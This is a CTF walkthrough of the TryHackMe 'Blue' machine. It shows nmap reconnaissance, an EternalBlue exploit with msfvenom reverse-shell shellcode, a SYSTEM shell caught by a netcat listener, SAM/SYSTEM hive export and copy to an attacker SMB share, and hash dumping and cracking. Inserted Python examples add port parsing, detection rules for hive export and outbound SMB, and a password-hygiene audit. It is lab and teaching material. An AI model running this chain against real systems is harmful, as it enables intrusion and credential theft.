
TryHackMe Blue

Blue machine

We start the reconnaissance phase by pinging the IP address 10.10.43.82.

❯ ping -c 1 10.10.43.82
PING 10.10.43.82 (10.10.43.82) 56(84) bytes of data.
64 bytes from 10.10.43.82: icmp_seq=1 ttl=127 time=153 ms

--- 10.10.43.82 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 152.809/152.809/152.809/0.000 ms

From the TTL in the ICMP reply (127, i.e. the Windows default of 128 minus one hop) we can tell that the target runs Windows. Next we run nmap to find the machine's open ports, exporting the output to the file allPorts.

❯ nmap -p- --open -sS --min-rate 5000 -vvv -Pn 10.10.43.82 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 16:08 CST
Initiating Parallel DNS resolution of 1 host. at 16:08
Completed Parallel DNS resolution of 1 host. at 16:08, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:08
Scanning 10.10.43.82 [65535 ports]
Discovered open port 445/tcp on 10.10.43.82
Discovered open port 135/tcp on 10.10.43.82
Discovered open port 139/tcp on 10.10.43.82
Discovered open port 3389/tcp on 10.10.43.82
Discovered open port 49159/tcp on 10.10.43.82
Discovered open port 49152/tcp on 10.10.43.82
Discovered open port 49153/tcp on 10.10.43.82
Discovered open port 49158/tcp on 10.10.43.82
Discovered open port 49154/tcp on 10.10.43.82
Completed SYN Stealth Scan at 16:09, 15.12s elapsed (65535 total ports)
Nmap scan report for 10.10.43.82
Host is up, received user-set (0.15s latency).
Scanned at 2023-06-17 16:08:46 CST for 15s
Not shown: 65268 closed tcp ports (reset), 258 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       REASON
135/tcp   open  msrpc         syn-ack ttl 127
139/tcp   open  netbios-ssn   syn-ack ttl 127
445/tcp   open  microsoft-ds  syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127
49152/tcp open  unknown       syn-ack ttl 127
49153/tcp open  unknown       syn-ack ttl 127
49154/tcp open  unknown       syn-ack ttl 127
49158/tcp open  unknown       syn-ack ttl 127
49159/tcp open  unknown       syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.26 seconds
           Raw packets sent: 74133 (3.262MB) | Rcvd: 67257 (2.690MB)

Using extractPorts, a function defined in zsh, we pull the most relevant information out of the grepable output.

❯ extractPorts allPorts
───────┬────────────────────────────────────────────────────────────────────
       │ File: extractPorts.tmp
───────┼────────────────────────────────────────────────────────────────────
   1   │ 
   2   │ [*] Extracting information...
   3   │ 
   4   │     [*] IP Address: 10.10.43.82
   5   │     [*] Open ports: 135,139,445,3389,49152,49153,49154,49158,49159
   6   │ 
   7   │ [*] Ports copied to clipboard
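The write-up does not show the body of extractPorts, so here is an added Python equivalent (my example, not the author's zsh function) that parses nmap's grepable (-oG) format, applies the same TTL heuristic used above, and turns the exposed ports into the findings a defender would raise. The allPorts content below is constructed for the example: it reproduces the host and the nine open ports from the scan, but the raw file itself never appears in the post.

```python
import re
from collections import defaultdict

# Constructed sample of nmap grepable (-oG) output. It mirrors the host and the
# nine open ports from the allPorts scan above, but the text itself is made up
# for this example (the write-up never shows the raw allPorts file).
SAMPLE_ALLPORTS = (
    "# Nmap 7.93 scan initiated Sat Jun 17 16:08:46 2023 as: nmap -p- --open -sS "
    "--min-rate 5000 -vvv -Pn 10.10.43.82 -oG allPorts\n"
    "Host: 10.10.43.82 ()\tStatus: Up\n"
    "Host: 10.10.43.82 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, "
    "49152/open/tcp/////, 49153/open/tcp/////, 49154/open/tcp/////, "
    "49158/open/tcp/////, 49159/open/tcp/////\tIgnored State: closed (65268)\n"
    "# Nmap done at Sat Jun 17 16:09:01 2023 -- 1 IP address (1 host up) "
    "scanned in 15.26 seconds\n"
)

HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\([^)]*\)\s+Ports:\s+(.*)$")

def parse_grepable(text):
    """Map each IP in -oG output to a list of (port, state, proto, service).

    Each entry in the Ports: field has seven slash-separated columns:
    port/state/protocol/owner/service/rpcinfo/version (most stay empty).
    """
    hosts = defaultdict(list)
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if not m:
            continue                      # comments and "Status: Up" lines
        ip, ports_field = m.group(1), m.group(2).split("\t")[0]
        for entry in ports_field.split(", "):
            cols = entry.split("/")
            hosts[ip].append((int(cols[0]), cols[1], cols[2], cols[4]))
    return dict(hosts)

def open_ports(text, ip):
    """Sorted open TCP ports for one host, like the extractPorts helper."""
    return sorted(p for p, state, proto, _ in parse_grepable(text).get(ip, [])
                  if state == "open" and proto == "tcp")

def guess_os_from_ttl(ttl):
    """Rough OS family from the TTL seen in an ICMP/TCP reply.

    Hosts start at 64 (Linux/Unix), 128 (Windows) or 255 (many network
    devices) and each router hop decrements by one, so 127 reads as Windows
    one hop away. It is a heuristic only: middleboxes can rewrite the TTL.
    """
    if ttl <= 64:
        return "Linux/Unix"
    if ttl <= 128:
        return "Windows"
    return "network device"

# Services a defender would not expect to be reachable from an untrusted network.
RISKY = {135: "MS-RPC endpoint mapper", 139: "NetBIOS session", 445: "SMB", 3389: "RDP"}

def exposure_findings(text, ip):
    """Human-readable findings for ports that widen the attack surface."""
    return [f"{p}/tcp ({RISKY[p]}) reachable from the scanning network"
            for p in open_ports(text, ip) if p in RISKY]

if __name__ == "__main__":
    ports = open_ports(SAMPLE_ALLPORTS, "10.10.43.82")
    print("[*] Open ports:", ",".join(map(str, ports)))
    print("[*] TTL 127 ->", guess_os_from_ttl(127))
    for finding in exposure_findings(SAMPLE_ALLPORTS, "10.10.43.82"):
        print("[!]", finding)
```

Run it on a real allPorts file by reading the file into `parse_grepable`; the comma-joined port list is exactly what the write-up's helper feeds into the targeted scan, and the findings list is what you would want in a hardening ticket for a host that exposes SMB and RDP.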

Next we run a set of scripts against the detected ports to identify the service and version running on each.

❯ nmap -sCV -p135,139,445,3389,49152,49153,49154,49158,49159 10.10.43.82 -oN targeted
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 16:10 CST
Nmap scan report for 10.10.43.82
Host is up (0.15s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2023-06-16T22:07:01
|_Not valid after:  2023-12-16T22:07:01
|_ssl-date: 2023-06-17T22:11:44+00:00; -5s from scanner time.
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-06-17T22:11:30
|_  start_date: 2023-06-17T22:06:59
|_clock-skew: mean: 1h14m55s, deviation: 2h30m00s, median: -5s
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02f713c77a41 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-17T17:11:29-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds

Port 445 is open and the host is a Windows machine running Windows 7 Professional, so we can check whether it is vulnerable to EternalBlue.

❯ nmap --script smb-vuln-ms17-010 -p445 10.10.43.82 -oN smb-vuln-ms17-010
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 16:17 CST
Nmap scan report for 10.10.43.82
Host is up (0.16s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 2.10 seconds

We can see that it is indeed vulnerable, so we download the AutoBlue-MS17-010 exploit:

❯ git clone https://github.com/3ndG4me/AutoBlue-MS17-010
Cloning into 'AutoBlue-MS17-010'...
remote: Enumerating objects: 136, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 136 (delta 46), reused 36 (delta 36), pack-reused 76
Receiving objects: 100% (136/136), 101.12 KiB | 790.00 KiB/s, done.
Resolving deltas: 100% (80/80), done.

We generate the reverse shell we will use to get into the machine:

❯ cd AutoBlue-MS17-010
❯ ll
drwxr-xr-x root root 192 B  Sat Jun 17 16:21:48 2023  shellcode
.rw-r--r-- root root 2.7 KB Sat Jun 17 16:21:48 2023  eternal_checker.py
.rw-r--r-- root root  26 KB Sat Jun 17 16:21:48 2023  eternalblue_exploit10.py
.rw-r--r-- root root  25 KB Sat Jun 17 16:21:48 2023  eternalblue_exploit7.py
.rw-r--r-- root root  24 KB Sat Jun 17 16:21:48 2023  eternalblue_exploit8.py
.rw-r--r-- root root 1.0 KB Sat Jun 17 16:21:48 2023  LICENSE
.rwxr-xr-x root root 3.8 KB Sat Jun 17 16:21:48 2023  listener_prep.sh
.rw-r--r-- root root  25 KB Sat Jun 17 16:21:48 2023  mysmb.py
.rw-r--r-- root root 5.2 KB Sat Jun 17 16:21:48 2023  README.md
.rw-r--r-- root root   8 B  Sat Jun 17 16:21:48 2023  requirements.txt
.rw-r--r-- root root  48 KB Sat Jun 17 16:21:48 2023  zzz_exploit.py
❯ cd shellcode
❯ ll
.rw-r--r-- root root  20 KB Sat Jun 17 16:21:48 2023  eternalblue_kshellcode_x64.asm
.rw-r--r-- root root  19 KB Sat Jun 17 16:21:48 2023  eternalblue_kshellcode_x86.asm
.rw-r--r-- root root 1.6 KB Sat Jun 17 16:21:48 2023  eternalblue_sc_merge.py
.rwxr-xr-x root root 4.5 KB Sat Jun 17 16:21:48 2023  shell_prep.sh
❯ ./shell_prep.sh
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.9.85.95
LPORT you want x64 to listen on:
443
LPORT you want x86 to listen on:
8443
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.9.85.95 LPORT=443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.9.85.95 LPORT=8443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

❯ ll
.rw-r--r-- root root  20 KB Sat Jun 17 16:21:48 2023  eternalblue_kshellcode_x64.asm
.rw-r--r-- root root  19 KB Sat Jun 17 16:21:48 2023  eternalblue_kshellcode_x86.asm
.rw-r--r-- root root 1.6 KB Sat Jun 17 16:21:48 2023  eternalblue_sc_merge.py
.rw-r--r-- root root 2.2 KB Sat Jun 17 16:23:29 2023  sc_all.bin
.rw-r--r-- root root 1.2 KB Sat Jun 17 16:23:29 2023  sc_x64.bin
.rw-r--r-- root root 772 B  Sat Jun 17 16:22:34 2023  sc_x64_kernel.bin
.rw-r--r-- root root 460 B  Sat Jun 17 16:23:21 2023  sc_x64_msf.bin
.rw-r--r-- root root 962 B  Sat Jun 17 16:23:29 2023  sc_x86.bin
.rw-r--r-- root root 638 B  Sat Jun 17 16:22:34 2023  sc_x86_kernel.bin
.rw-r--r-- root root 324 B  Sat Jun 17 16:23:29 2023  sc_x86_msf.bin
.rwxr-xr-x root root 4.5 KB Sat Jun 17 16:21:48 2023  shell_prep.sh

We start a listener on port 443 and run the exploit; sometimes it needs to be run several times:

❯ python3 eternalblue_exploit7.py 10.10.43.82 shellcode/sc_x64.bin
shellcode size: 1232
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
❯ python3 eternalblue_exploit7.py 10.10.43.82 shellcode/sc_x64.bin
shellcode size: 1232
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
❯ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.85.95] from (UNKNOWN) [10.10.43.82] 49205
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

We are now inside the machine as nt authority\system. To obtain the users' hashes we need the SAM and SYSTEM hives:

C:\Windows\system32>cd C:\Users\Public\Dowloads
cd C:\Users\Public\Dowloads

C:\Users\Public\Downloads>reg save HKLM\SAM sam
reg save HKLM\SAM sam
The operation completed successfully.

C:\Users\Public\Downloads>reg save HKLM\SYSTEM system
reg save HKLM\SYSTEM system
The operation completed successfully.

C:\Users\Public\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users\Public\Downloads

06/17/2023  05:30 PM    <DIR>          .
06/17/2023  05:30 PM    <DIR>          ..
06/17/2023  05:30 PM            24,576 sam
06/17/2023  05:30 PM        12,337,152 system
               2 File(s)     12,361,728 bytes
               2 Dir(s)  20,605,276,160 bytes free

C:\Users\Public\Downloads>

We share the files back to our attacking machine by bringing up an SMB share:

❯ impacket-smbserver smbFolder $(pwd) -smb2support
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.43.82,49689)
[*] AUTHENTICATE_MESSAGE (\,JON-PC)
[*] User JON-PC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:smbFolder)
C:\Users\Public\Downloads>copy sam \\10.9.85.95\smbFolder\sam
copy sam \\10.9.85.95\smbFolder\sam
        1 file(s) copied.

C:\Users\Public\Downloads>copy system \\10.9.85.95\smbFolder\system
copy system \\10.9.85.95\smbFolder\system
        1 file(s) copied.

C:\Users\Public\Downloads>
❯ ll
.rwxr-xr-x root root 24 KB Sat Jun 17 16:30:41 2023  sam
.rwxr-xr-x root root 12 MB Sat Jun 17 16:30:52 2023  system
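The two steps above (exporting the SAM and SYSTEM hives with `reg save`, then copying them out over SMB) are the part of this chain a blue team can catch on the endpoint. The following is an added Python example of mine, not something from the write-up or from AutoBlue, showing the two detection rules run over constructed telemetry shaped like Sysmon Event ID 1 (process creation) and Event ID 3 (network connection) records. Note that `copy` is a cmd.exe built-in, so it produces no process-creation event of its own; what does show up is the SMB redirector (the System process) opening TCP 445 to the share host. The trusted network range 10.10.0.0/16 and the benign filler records are assumptions of the example.

```python
import re
import ipaddress

# Constructed telemetry shaped like Sysmon Event ID 1 (process creation) and
# Event ID 3 (network connection) records. Records 1-3 replay what the shell
# above did; the others are benign filler so the rules have something to ignore.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\reg.exe", "cmdline": r"reg save HKLM\SAM sam"},
    {"id": 2, "type": "process", "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\reg.exe", "cmdline": r"reg save HKLM\SYSTEM system"},
    # "copy sam \\10.9.85.95\smbFolder\sam" surfaces as the SMB redirector
    # (the System process) opening TCP 445 to the share host
    {"id": 3, "type": "network", "user": r"NT AUTHORITY\SYSTEM", "image": "System",
     "dst_ip": "10.9.85.95", "dst_port": 445},
    {"id": 4, "type": "process", "user": r"JON-PC\Jon",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"'},
    {"id": 5, "type": "network", "user": r"NT AUTHORITY\SYSTEM", "image": "System",
     "dst_ip": "10.10.10.5", "dst_port": 445},
    {"id": 6, "type": "process", "user": r"JON-PC\Jon",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save HKLM\SOFTWARE\Contoso backup.hiv"},
]

# Hives that hold local credentials or the boot key needed to decrypt them.
HIVE_EXPORT = re.compile(r"\breg(?:\.exe)?\s+save\s+\"?hklm\\(sam|system|security)\b",
                         re.IGNORECASE)
# Assumed for the example: file servers live in 10.10.0.0/16; SMB to any other
# destination is unexpected for a workstation.
TRUSTED_SMB_NETS = [ipaddress.ip_network("10.10.0.0/16")]
SMB_PORTS = {139, 445}

def is_privileged(user):
    return user.upper().endswith(("\\SYSTEM", "\\ADMINISTRATOR"))

def check_event(ev):
    """Return (rule, severity) if the record matches a rule, else None."""
    if ev["type"] == "process":
        m = HIVE_EXPORT.search(ev["cmdline"])
        if m:
            return (f"credential hive export: HKLM\\{m.group(1).upper()}", "high")
    elif ev["type"] == "network" and ev["dst_port"] in SMB_PORTS:
        dst = ipaddress.ip_address(ev["dst_ip"])
        if not any(dst in net for net in TRUSTED_SMB_NETS):
            sev = "high" if is_privileged(ev["user"]) else "medium"
            return (f"outbound SMB to untrusted host {dst}:{ev['dst_port']}", sev)
    return None

def detect(events):
    """Run every record through the rules; returns [(event id, rule, severity)]."""
    hits = []
    for ev in events:
        result = check_event(ev)
        if result:
            hits.append((ev["id"], *result))
    return hits

if __name__ == "__main__":
    for event_id, rule, sev in detect(SAMPLE_EVENTS):
        print(f"[{sev.upper()}] event {event_id}: {rule}")
```

The hive rule deliberately ignores exports of other hives (record 6) so that legitimate registry backups do not page anyone, and the SMB rule only fires for destinations outside the allow-listed server range; a host that is already running commands as SYSTEM and then talks SMB to an address it has never used is the combination worth an immediate look.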

Now that we have the files, we use secretsdump to obtain the users' hashes:

❯ impacket-secretsdump -sam sam -system system local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x55bd17830e678f18a3110daf2c17d4c7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
[*] Cleaning up...

If we want to find user Jon's password, we crack the hash with john:

❯ john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=16
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:00 DONE (2023-06-17 16:41) 2.222g/s 11333Kp/s 11333Kc/s 11339KC/s alr19882006..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
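Two things in the secretsdump and john output above deserve a closer look than a CTF usually gives them: Administrator and Guest carry the NT hash of the empty password (which is why john printed a blank password for Administrator), and every account shows the placeholder LM hash, meaning LM storage is off. The added Python example below (mine, not code from the write-up or from Impacket) parses the dump, computes NT hashes with a small MD4 implementation (hashlib's md4 is disabled on many OpenSSL 3 builds, so it is written out), and audits the accounts the way a local password-hygiene check would; it also confirms that the value john recovered really does hash to Jon's entry. The dump text is a constructed copy of the lines shown above.

```python
import re
import struct

# Constructed copy of the secretsdump lines above (uid:rid:lmhash:nthash:::).
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
[*] Cleaning up...
"""

def _rol(x, s):
    return ((x << s) | (x >> (32 - s))) & 0xFFFFFFFF

def md4(data):
    """MD4 (RFC 1320) hex digest, written out because hashlib's md4 is
    disabled on many OpenSSL 3 builds."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    st = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = st
        for i in range(16):                     # round 1
            a = _rol((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                     # round 2
            k = (i % 4) * 4 + i // 4
            a = _rol((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                     # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        st = [(s + v) & 0xFFFFFFFF for s, v in zip(st, (a, b, c, d))]
    return struct.pack("<4I", *st).hex()

def nt_hash(password):
    """NT hash = MD4 over the UTF-16LE encoding of the password, unsalted."""
    return md4(password.encode("utf-16-le"))

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # placeholder LM hash when LM storage is off
EMPTY_NT = nt_hash("")                          # 31d6cfe0d16ae931b73c59d7e0c089c0

LINE = re.compile(r"^([^:\s]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::", re.IGNORECASE)

def parse_secretsdump(text):
    out = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            out.append({"user": m.group(1), "rid": int(m.group(2)),
                        "lm": m.group(3).lower(), "nt": m.group(4).lower()})
    return out

def audit(entries):
    """Hygiene findings per account: empty password, LM hash still stored,
    NT hash shared with another account (same password reused)."""
    by_nt = {}
    for e in entries:
        by_nt.setdefault(e["nt"], []).append(e["user"])
    findings = {}
    for e in entries:
        issues = []
        if e["nt"] == EMPTY_NT:
            issues.append("empty password")
        if e["lm"] != EMPTY_LM:
            issues.append("LM hash stored (trivially crackable)")
        others = [u for u in by_nt[e["nt"]] if u != e["user"]]
        if others and e["nt"] != EMPTY_NT:
            issues.append("password shared with " + ", ".join(others))
        findings[e["user"]] = issues
    return findings

def accounts_using(entries, password):
    """Accounts whose NT hash equals that of a candidate password, e.g. to
    confirm a cracked value or to check a banned-password list."""
    h = nt_hash(password)
    return [e["user"] for e in entries if e["nt"] == h]

if __name__ == "__main__":
    entries = parse_secretsdump(SAMPLE_DUMP)
    for user, issues in audit(entries).items():
        print(f"{user}: {', '.join(issues) or 'no findings'}")
    print("alqfna22 ->", accounts_using(entries, "alqfna22"))
```

Because the NT hash is an unsalted MD4 of the password, any two accounts with the same password share a hash, and a leaked SAM lets an attacker test candidates offline at the rates john reports above (over 11 million per second here); that is the argument for long passphrases, for disabling the built-in Administrator account when it is not needed, and for keeping SMBv1 off so the hives never leave the box in the first place.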
This post is licensed under CC BY 4.0 by the author.